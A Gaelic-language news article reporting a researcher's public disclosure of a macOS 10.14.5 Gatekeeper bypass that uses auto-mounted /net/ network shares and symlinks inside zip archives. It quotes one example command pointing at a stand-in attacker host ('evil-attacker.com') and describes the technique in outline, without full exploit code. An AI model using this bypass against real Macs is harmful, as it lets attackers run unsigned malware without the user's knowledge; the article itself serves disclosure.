Dùin sanas

Chuir an neach-rannsachaidh tèarainteachd Filippo Cavallarin rabhadh mun bhug ann am macOS 10.14.5 air a’ bhlog aige. Tha seo a’ toirt a-steach comas a bhith a’ dol seachad air ceumannan tèarainteachd Gatekeeper gu tur. A rèir Cavallarin, chomharraich e a ’mhearachd gu Apple mu thràth sa Ghearran am-bliadhna, ach cha do shocraich a’ chompanaidh e san ùrachadh as ùire.

Chaidh Gatekeeper a leasachadh le Apple agus chaidh a thoirt a-steach don t-siostam obrachaidh deasg aige airson a’ chiad uair ann an 2012. Is e inneal a th ’ann a chuireas casg air tagradh bho bhith a’ ruith gun eòlas agus cead an neach-cleachdaidh. Às deidh dhut aplacaid a luchdachadh sìos, bidh Gatekeeper gu fèin-ghluasadach a’ sgrùdadh a chòd gus faicinn a bheil am bathar-bog air a shoidhnigeadh gu ceart le Apple.

Anns a’ phost bhlog aige, tha Cavallarin ag ràdh gu bheil Gatekeeper, gu bunaiteach, den bheachd gu bheil an dà chuid stòradh taobh a-muigh agus earrannan lìonra mar àiteachan tèarainte. Mar sin faodar tagradh sam bith a tha a’ fuireach anns na targaidean sin a chuir air bhog gu fèin-ghluasadach gun a bhith a’ dol tro sgrùdadh Gatekeeper. Is e am feart seo a ghabhas brath gus bathar-bog droch-rùnach a chuir air bhog gun eòlas an neach-cleachdaidh.

Is e aon taobh a leigeas le ruigsinneachd gun chead am feart fèin-ghluasadach, a leigeas le luchd-cleachdaidh co-roinn lìonra a chuir suas gu fèin-ghluasadach dìreach le bhith a ’sònrachadh slighe a’ tòiseachadh le “/net/”. Mar eisimpleir, tha Cavallarin ag ainmeachadh an t-slighe "ls /net/evil-attacker.com/sharedfolder/" a dh' fhaodadh an siostam obrachaidh a bhith a 'luchdachadh susbaint pasgan "sharefolder" ann an àite iomallach a dh' fhaodadh a bhith droch-rùnach.

Faodaidh tu coimhead air mar a tha an cunnart ag obair anns a’ bhidio:

Is e feart eile an fhìrinn ma tha tasglann zip anns a bheil symlink sònraichte a’ leantainn gu gnìomh fèin-ghluasadach air a cho-roinn, cha tèid a sgrùdadh le Gatekeeper. San dòigh seo, is urrainn don neach-fulang an tasglann droch-rùnach a luchdachadh sìos gu furasta agus a unzip, a ’leigeil leis an neach-ionnsaigh cha mhòr bathar-bog sam bith a ruith air Mac gun eòlas an neach-cleachdaidh. Tha a chuibhreann den so-leòntachd seo cuideachd aig an Lorgar, a bhios a’ falach cuid de leudachaidhean gu bunaiteach.

Tha Cavallarin ag ràdh air a’ bhlog aige gun do tharraing Apple aire gu so-leòntachd an t-siostam obrachaidh macOS air 22 Gearran am-bliadhna. Ach ann am meadhan a 'Chèitein, sguir Apple a bhith a' conaltradh ri Cavallarin, agus mar sin cho-dhùin Cavallarin an rud gu lèir a dhèanamh poblach.

mac-lorg-kit

Tobar: FCVL

.